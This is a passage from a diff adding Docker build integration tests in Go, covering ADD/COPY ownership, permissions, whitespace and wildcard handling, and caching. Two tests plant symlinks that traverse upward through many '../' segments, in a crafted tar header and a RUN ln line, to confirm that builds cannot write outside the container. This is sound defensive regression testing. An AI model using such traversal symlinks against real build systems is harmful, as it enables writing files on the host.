+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testaddimg"
+	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN touch /exists
+RUN chown dockerio.dockerio /exists
+ADD test_file /
+RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ]
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod),
+		map[string]string{
+			"test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+// Issue #3960: "ADD src ." hangs
+func (s *DockerSuite) TestBuildAddSingleFileToWorkdir(c *check.C) {
+	name := "testaddsinglefiletoworkdir"
+	ctx, err := fakeContext(`FROM busybox
+ADD test_file .`,
+		map[string]string{
+			"test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	errChan := make(chan error)
+	go func() {
+		_, err := buildImageFromContext(name, ctx, true)
+		errChan <- err
+		close(errChan)
+	}()
+	select {
+	case <-time.After(15 * time.Second):
+		c.Fatal("Build with adding to workdir timed out")
+	case err := <-errChan:
+		c.Assert(err, check.IsNil)
+	}
+}
+
+func (s *DockerSuite) TestBuildAddSingleFileToExistDir(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testaddsinglefiletoexistdir"
+	ctx, err := fakeContext(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN mkdir /exists
+RUN touch /exists/exists_file
+RUN chown -R dockerio.dockerio /exists
+ADD test_file /exists/
+RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
+RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
+		map[string]string{
+			"test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildCopyAddMultipleFiles(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	server, err := fakeStorage(map[string]string{
+		"robots.txt": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server.Close()
+
+	name := "testcopymultiplefilestofile"
+	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN mkdir /exists
+RUN touch /exists/exists_file
+RUN chown -R dockerio.dockerio /exists
+COPY test_file1 test_file2 /exists/
+ADD test_file3 test_file4 %s/robots.txt /exists/
+RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
+RUN [ $(ls -l /exists/test_file1 | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /exists/test_file2 | awk '{print $3":"$4}') = 'root:root' ]
+
+RUN [ $(ls -l /exists/test_file3 | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /exists/test_file4 | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /exists/robots.txt | awk '{print $3":"$4}') = 'root:root' ]
+
+RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
+`, server.URL()),
+		map[string]string{
+			"test_file1": "test1",
+			"test_file2": "test2",
+			"test_file3": "test3",
+			"test_file4": "test4",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+// This test is mainly for user namespaces to verify that new directories
+// are created as the remapped root uid/gid pair
+func (s *DockerSuite) TestBuildAddToNewDestination(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testaddtonewdest"
+	ctx, err := fakeContext(`FROM busybox
+ADD . /new_dir
+RUN ls -l /
+RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`,
+		map[string]string{
+			"test_dir/test_file": "test file",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+// This test is mainly for user namespaces to verify that new directories
+// are created as the remapped root uid/gid pair
+func (s *DockerSuite) TestBuildCopyToNewParentDirectory(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testcopytonewdir"
+	ctx, err := fakeContext(`FROM busybox
+COPY test_dir /new_dir
+RUN ls -l /new_dir
+RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`,
+		map[string]string{
+			"test_dir/test_file": "test file",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+// This test is mainly for user namespaces to verify that new directories
+// are created as the remapped root uid/gid pair
+func (s *DockerSuite) TestBuildWorkdirIsContainerRoot(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testworkdirownership"
+	if _, err := buildImage(name, `FROM busybox
+WORKDIR /new_dir
+RUN ls -l /
+RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildAddFileWithWhitespace(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Not currently passing on Windows
+	name := "testaddfilewithwhitespace"
+	ctx, err := fakeContext(`FROM busybox
+RUN mkdir "/test dir"
+RUN mkdir "/test_dir"
+ADD [ "test file1", "/test_file1" ]
+ADD [ "test_file2", "/test file2" ]
+ADD [ "test file3", "/test file3" ]
+ADD [ "test dir/test_file4", "/test_dir/test_file4" ]
+ADD [ "test_dir/test_file5", "/test dir/test_file5" ]
+ADD [ "test dir/test_file6", "/test dir/test_file6" ]
+RUN [ $(cat "/test_file1") = 'test1' ]
+RUN [ $(cat "/test file2") = 'test2' ]
+RUN [ $(cat "/test file3") = 'test3' ]
+RUN [ $(cat "/test_dir/test_file4") = 'test4' ]
+RUN [ $(cat "/test dir/test_file5") = 'test5' ]
+RUN [ $(cat "/test dir/test_file6") = 'test6' ]`,
+		map[string]string{
+			"test file1":          "test1",
+			"test_file2":          "test2",
+			"test file3":          "test3",
+			"test dir/test_file4": "test4",
+			"test_dir/test_file5": "test5",
+			"test dir/test_file6": "test6",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildCopyFileWithWhitespace(c *check.C) {
+	dockerfile := `FROM busybox
+RUN mkdir "/test dir"
+RUN mkdir "/test_dir"
+COPY [ "test file1", "/test_file1" ]
+COPY [ "test_file2", "/test file2" ]
+COPY [ "test file3", "/test file3" ]
+COPY [ "test dir/test_file4", "/test_dir/test_file4" ]
+COPY [ "test_dir/test_file5", "/test dir/test_file5" ]
+COPY [ "test dir/test_file6", "/test dir/test_file6" ]
+RUN [ $(cat "/test_file1") = 'test1' ]
+RUN [ $(cat "/test file2") = 'test2' ]
+RUN [ $(cat "/test file3") = 'test3' ]
+RUN [ $(cat "/test_dir/test_file4") = 'test4' ]
+RUN [ $(cat "/test dir/test_file5") = 'test5' ]
+RUN [ $(cat "/test dir/test_file6") = 'test6' ]`
+
+	if daemonPlatform == "windows" {
+		dockerfile = `FROM ` + WindowsBaseImage + `
+RUN mkdir "C:/test dir"
+RUN mkdir "C:/test_dir"
+COPY [ "test file1", "/test_file1" ]
+COPY [ "test_file2", "/test file2" ]
+COPY [ "test file3", "/test file3" ]
+COPY [ "test dir/test_file4", "/test_dir/test_file4" ]
+COPY [ "test_dir/test_file5", "/test dir/test_file5" ]
+COPY [ "test dir/test_file6", "/test dir/test_file6" ]
+RUN find "test1" "C:/test_file1"
+RUN find "test2" "C:/test file2"
+RUN find "test3" "C:/test file3"
+RUN find "test4" "C:/test_dir/test_file4"
+RUN find "test5" "C:/test dir/test_file5"
+RUN find "test6" "C:/test dir/test_file6"`
+	}
+
+	name := "testcopyfilewithwhitespace"
+	ctx, err := fakeContext(dockerfile,
+		map[string]string{
+			"test file1":          "test1",
+			"test_file2":          "test2",
+			"test file3":          "test3",
+			"test dir/test_file4": "test4",
+			"test_dir/test_file5": "test5",
+			"test dir/test_file6": "test6",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) {
+	name := "testcopywildcard"
+	server, err := fakeStorage(map[string]string{
+		"robots.txt": "hello",
+		"index.html": "world",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server.Close()
+
+	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+	COPY file*.txt /tmp/
+	RUN ls /tmp/file1.txt /tmp/file2.txt
+	RUN [ "mkdir",  "/tmp1" ]
+	COPY dir* /tmp1/
+	RUN ls /tmp1/dirt /tmp1/nested_file /tmp1/nested_dir/nest_nest_file
+	RUN [ "mkdir",  "/tmp2" ]
+        ADD dir/*dir %s/robots.txt /tmp2/
+	RUN ls /tmp2/nest_nest_file /tmp2/robots.txt
+	`, server.URL()),
+		map[string]string{
+			"file1.txt":                     "test1",
+			"file2.txt":                     "test2",
+			"dir/nested_file":               "nested file",
+			"dir/nested_dir/nest_nest_file": "2 times nested",
+			"dirt": "dirty",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// Now make sure we use a cache the 2nd time
+	id2, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	if id1 != id2 {
+		c.Fatal("didn't use the cache")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildCopyWildcardInName(c *check.C) {
+	name := "testcopywildcardinname"
+	ctx, err := fakeContext(`FROM busybox
+	COPY *.txt /tmp/
+	RUN [ "$(cat /tmp/\*.txt)" = 'hi there' ]
+	`, map[string]string{"*.txt": "hi there"})
+
+	if err != nil {
+		// Normally we would do c.Fatal(err) here but given that
+		// the odds of this failing are so rare, it must be because
+		// the OS we're running the client on doesn't support * in
+		// filenames (like windows).  So, instead of failing the test
+		// just let it pass. Then we don't need to explicitly
+		// say which OSs this works on or not.
+		return
+	}
+	defer ctx.Close()
+
+	_, err = buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatalf("should have built: %q", err)
+	}
+}
+
+func (s *DockerSuite) TestBuildCopyWildcardCache(c *check.C) {
+	name := "testcopywildcardcache"
+	ctx, err := fakeContext(`FROM busybox
+	COPY file1.txt /tmp/`,
+		map[string]string{
+			"file1.txt": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// Now make sure we use a cache the 2nd time even with wild cards.
+	// Use the same context so the file is the same and the checksum will match
+	ctx.Add("Dockerfile", `FROM busybox
+	COPY file*.txt /tmp/`)
+
+	id2, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	if id1 != id2 {
+		c.Fatal("didn't use the cache")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildAddSingleFileToNonExistingDir(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testaddsinglefiletononexistingdir"
+	ctx, err := fakeContext(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN touch /exists
+RUN chown dockerio.dockerio /exists
+ADD test_file /test_dir/
+RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
+		map[string]string{
+			"test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildAddDirContentToRoot(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testadddircontenttoroot"
+	ctx, err := fakeContext(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN touch /exists
+RUN chown dockerio.dockerio exists
+ADD test_dir /
+RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
+		map[string]string{
+			"test_dir/test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildAddDirContentToExistingDir(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testadddircontenttoexistingdir"
+	ctx, err := fakeContext(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN mkdir /exists
+RUN touch /exists/exists_file
+RUN chown -R dockerio.dockerio /exists
+ADD test_dir/ /exists/
+RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
+RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
+RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`,
+		map[string]string{
+			"test_dir/test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildAddWholeDirToRoot(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testaddwholedirtoroot"
+	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN touch /exists
+RUN chown dockerio.dockerio exists
+ADD test_dir /test_dir
+RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l / | grep test_dir | awk '{print $1}') = 'drwxr-xr-x' ]
+RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ]
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod),
+		map[string]string{
+			"test_dir/test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+// Testing #5941
+func (s *DockerSuite) TestBuildAddEtcToRoot(c *check.C) {
+	name := "testaddetctoroot"
+
+	ctx, err := fakeContext(`FROM `+minimalBaseImage()+`
+ADD . /`,
+		map[string]string{
+			"etc/test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+// Testing #9401
+func (s *DockerSuite) TestBuildAddPreservesFilesSpecialBits(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testaddpreservesfilesspecialbits"
+	ctx, err := fakeContext(`FROM busybox
+ADD suidbin /usr/bin/suidbin
+RUN chmod 4755 /usr/bin/suidbin
+RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ]
+ADD ./data/ /
+RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ]`,
+		map[string]string{
+			"suidbin":             "suidbin",
+			"/data/usr/test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildCopySingleFileToRoot(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testcopysinglefiletoroot"
+	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN touch /exists
+RUN chown dockerio.dockerio /exists
+COPY test_file /
+RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ]
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod),
+		map[string]string{
+			"test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+// Issue #3960: "ADD src ." hangs - adapted for COPY
+func (s *DockerSuite) TestBuildCopySingleFileToWorkdir(c *check.C) {
+	name := "testcopysinglefiletoworkdir"
+	ctx, err := fakeContext(`FROM busybox
+COPY test_file .`,
+		map[string]string{
+			"test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	errChan := make(chan error)
+	go func() {
+		_, err := buildImageFromContext(name, ctx, true)
+		errChan <- err
+		close(errChan)
+	}()
+	select {
+	case <-time.After(15 * time.Second):
+		c.Fatal("Build with adding to workdir timed out")
+	case err := <-errChan:
+		c.Assert(err, check.IsNil)
+	}
+}
+
+func (s *DockerSuite) TestBuildCopySingleFileToExistDir(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testcopysinglefiletoexistdir"
+	ctx, err := fakeContext(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN mkdir /exists
+RUN touch /exists/exists_file
+RUN chown -R dockerio.dockerio /exists
+COPY test_file /exists/
+RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
+RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
+		map[string]string{
+			"test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildCopySingleFileToNonExistDir(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testcopysinglefiletononexistdir"
+	ctx, err := fakeContext(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN touch /exists
+RUN chown dockerio.dockerio /exists
+COPY test_file /test_dir/
+RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
+		map[string]string{
+			"test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildCopyDirContentToRoot(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testcopydircontenttoroot"
+	ctx, err := fakeContext(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN touch /exists
+RUN chown dockerio.dockerio exists
+COPY test_dir /
+RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
+		map[string]string{
+			"test_dir/test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildCopyDirContentToExistDir(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testcopydircontenttoexistdir"
+	ctx, err := fakeContext(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN mkdir /exists
+RUN touch /exists/exists_file
+RUN chown -R dockerio.dockerio /exists
+COPY test_dir/ /exists/
+RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
+RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
+RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`,
+		map[string]string{
+			"test_dir/test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildCopyWholeDirToRoot(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Linux specific test
+	name := "testcopywholedirtoroot"
+	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+RUN echo 'dockerio:x:1001:' >> /etc/group
+RUN touch /exists
+RUN chown dockerio.dockerio exists
+COPY test_dir /test_dir
+RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l / | grep test_dir | awk '{print $1}') = 'drwxr-xr-x' ]
+RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ]
+RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ]
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod),
+		map[string]string{
+			"test_dir/test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildCopyEtcToRoot(c *check.C) {
+	name := "testcopyetctoroot"
+
+	ctx, err := fakeContext(`FROM `+minimalBaseImage()+`
+COPY . /`,
+		map[string]string{
+			"etc/test_file": "test1",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Not currently working on Windows
+
+	dockerfile := `
+		FROM scratch
+		ADD links.tar /
+		ADD foo.txt /symlink/
+		`
+	targetFile := "foo.txt"
+	var (
+		name = "test-link-absolute"
+	)
+	ctx, err := fakeContext(dockerfile, nil)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	tempDir, err := ioutil.TempDir("", "test-link-absolute-temp-")
+	if err != nil {
+		c.Fatalf("failed to create temporary directory: %s", tempDir)
+	}
+	defer os.RemoveAll(tempDir)
+
+	var symlinkTarget string
+	if runtime.GOOS == "windows" {
+		var driveLetter string
+		if abs, err := filepath.Abs(tempDir); err != nil {
+			c.Fatal(err)
+		} else {
+			driveLetter = abs[:1]
+		}
+		tempDirWithoutDrive := tempDir[2:]
+		symlinkTarget = fmt.Sprintf(`%s:\..\..\..\..\..\..\..\..\..\..\..\..%s`, driveLetter, tempDirWithoutDrive)
+	} else {
+		symlinkTarget = fmt.Sprintf("/../../../../../../../../../../../..%s", tempDir)
+	}
+
+	tarPath := filepath.Join(ctx.Dir, "links.tar")
+	nonExistingFile := filepath.Join(tempDir, targetFile)
+	fooPath := filepath.Join(ctx.Dir, targetFile)
+
+	tarOut, err := os.Create(tarPath)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	tarWriter := tar.NewWriter(tarOut)
+
+	header := &tar.Header{
+		Name:     "symlink",
+		Typeflag: tar.TypeSymlink,
+		Linkname: symlinkTarget,
+		Mode:     0755,
+		Uid:      0,
+		Gid:      0,
+	}
+
+	err = tarWriter.WriteHeader(header)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	tarWriter.Close()
+	tarOut.Close()
+
+	foo, err := os.Create(fooPath)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer foo.Close()
+
+	if _, err := foo.WriteString("test"); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, err := os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) {
+		c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) {
+	testRequires(c, DaemonIsLinux) // ln not implemented on Windows busybox
+	const (
+		dockerfileTemplate = `
+		FROM busybox
+		RUN ln -s /../../../../../../../../%s /x
+		VOLUME /x
+		ADD foo.txt /x/`
+		targetFile = "foo.txt"
+	)
+	var (
+		name       = "test-link-absolute-volume"
+		dockerfile = ""
+	)
+
+	tempDir, err := ioutil.TempDir("", "test-link-absolute-volume-temp-")
+	if err != nil {
+		c.Fatalf("failed to create temporary directory: %s", tempDir)
+	}
+	defer os.RemoveAll(tempDir)
+
+	dockerfile = fmt.Sprintf(dockerfileTemplate, tempDir)
+	nonExistingFile := filepath.Join(tempDir, targetFile)
+
+	ctx, err := fakeContext(dockerfile, nil)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	fooPath := filepath.Join(ctx.Dir, targetFile)
+
+	foo, err := os.Create(fooPath)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer foo.Close()
+
+	if _, err := foo.WriteString("test"); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, err := os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) {
+		c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile)
+	}
+
+}
+
+// Issue #5270 - ensure we throw a better error than "unexpected EOF"
+// when we can't access files in the context.
+func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) {
+	testRequires(c, DaemonIsLinux, UnixCli) // test uses chown/chmod: not available on windows
+
+	{
+		name := "testbuildinaccessiblefiles"
+		ctx, err := fakeContext("FROM scratch\nADD . /foo/", map[string]string{"fileWithoutReadAccess": "foo"})
+		if err != nil {
+			c.Fatal(err)
+		}
+		defer ctx.Close()
+		// This is used to ensure we detect inaccessible files early during build in the cli client
+		pathToFileWithoutReadAccess := filepath.Join(ctx.Dir, "fileWithoutReadAccess")
+
+		if err = os.Chown(pathToFileWithoutReadAccess, 0, 0); err != nil {
+			c.Fatalf("failed to chown file to root: %s", err)
+		}
+		if err = os.Chmod(pathToFileWithoutReadAccess, 0700); err != nil {
+			c.Fatalf("failed to chmod file to 700: %s", err)
+		}
+		buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name))
+		buildCmd.Dir = ctx.Dir
+		out, _, err := runCommandWithOutput(buildCmd)
+		if err == nil {
+			c.Fatalf("build should have failed: %s %s", err, out)
+		}
+
+		// check if we've detected the failure before we started building
+		if !strings.Contains(out, "no permission to read from ") {
+			c.Fatalf("output should've contained the string: no permission to read from but contained: %s", out)
+		}
+
+		if !strings.Contains(out, "Error checking context") {
+			c.Fatalf("output should've contained the string: Error checking context")
+		}
+	}
+	{
+		name := "testbuildinaccessibledirectory"
+		ctx, err := fakeContext("FROM scratch\nADD . /foo/", map[string]string{"directoryWeCantStat/bar": "foo"})
+		if err != nil {
+			c.Fatal(err)
+		}
+		defer ctx.Close()
+		// This is used to ensure we detect inaccessible directories early during build in the cli client
+		pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat")
+		pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar")
+
